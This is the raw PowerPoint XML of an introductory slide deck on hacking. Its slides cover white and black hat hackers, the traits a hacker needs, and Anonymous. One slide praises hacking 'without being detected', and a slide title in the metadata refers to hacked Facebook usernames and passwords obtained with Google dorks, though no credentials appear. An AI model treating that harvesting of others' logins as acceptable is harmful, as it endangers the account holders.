              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>electronics. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hackers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>like to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="33CC33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>explore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and learn how computer systems </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>work.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Finding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ways to make them do what they do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="33CC33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>better</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, or do things they </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="33CC33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>weren’t intended</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to do.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3077" name="Picture 5" descr="C:\Users\NAWAZ\Desktop\Hacker-Wallpaper-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4437112"/>
            <a:ext cx="5334000" cy="242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90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500034" y="714356"/>
            <a:ext cx="8110566" cy="5447645"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Types of hackers:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>There are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2 types </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of hackers in today’s internet world, they are:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="33CC33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>White Hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>good </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>guys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> who don’t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use their skills for illegal purposes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Computer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>experts.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="33CC33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Black Hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bad </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>guys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> who </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use their skills maliciously for personal gain. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>They  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hack banks, steal credit cards, and deface websites.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3536574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304800" y="928670"/>
            <a:ext cx="8839200" cy="5232202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Berlin Sans FB Demi" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What does it take to become a hacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Berlin Sans FB Demi" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Becoming a great hacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>isn’t  easy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Being </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>creative helps a lot. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
              <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>creative</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> you are the bigger chance you have of hacking a system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>without being detected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Another </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>huge quality you must have is the will to learn because without it, you will get nowhere. Remember, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Knowledge is power</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Patience</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> is also a must because many topics can be difficult to grasp and only over time will you master them.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4168393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285720" y="214290"/>
            <a:ext cx="5791200" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Recent trends</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857224" y="1714488"/>
            <a:ext cx="7696200" cy="3970318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A hacking community called “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>THE ANONYMOUS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” is prevalent in USA, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>held </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>million march </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to protest against spying of USA on other countries.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>They defaced many international websites.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="405343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Picture 1" descr="C:\Users\kingkhan\Desktop\399676-anonymous-fact-sheet.jpg"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-152400" y="-457200"/>
            <a:ext cx="9448800" cy="7315200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="986652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1752</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>197</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Few Hacked FB usernames with passwords obtained from Google dorks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Heaven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NAWAZ KHAN</dc:creator>
  <cp:lastModifiedBy>NAWAZ KHAN</cp:lastModifiedBy>
  <cp:revision>51</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-11-28T13:37:13Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-11-30T01:38:57Z</dcterms:modified>
</cp:coreProperties>
</file>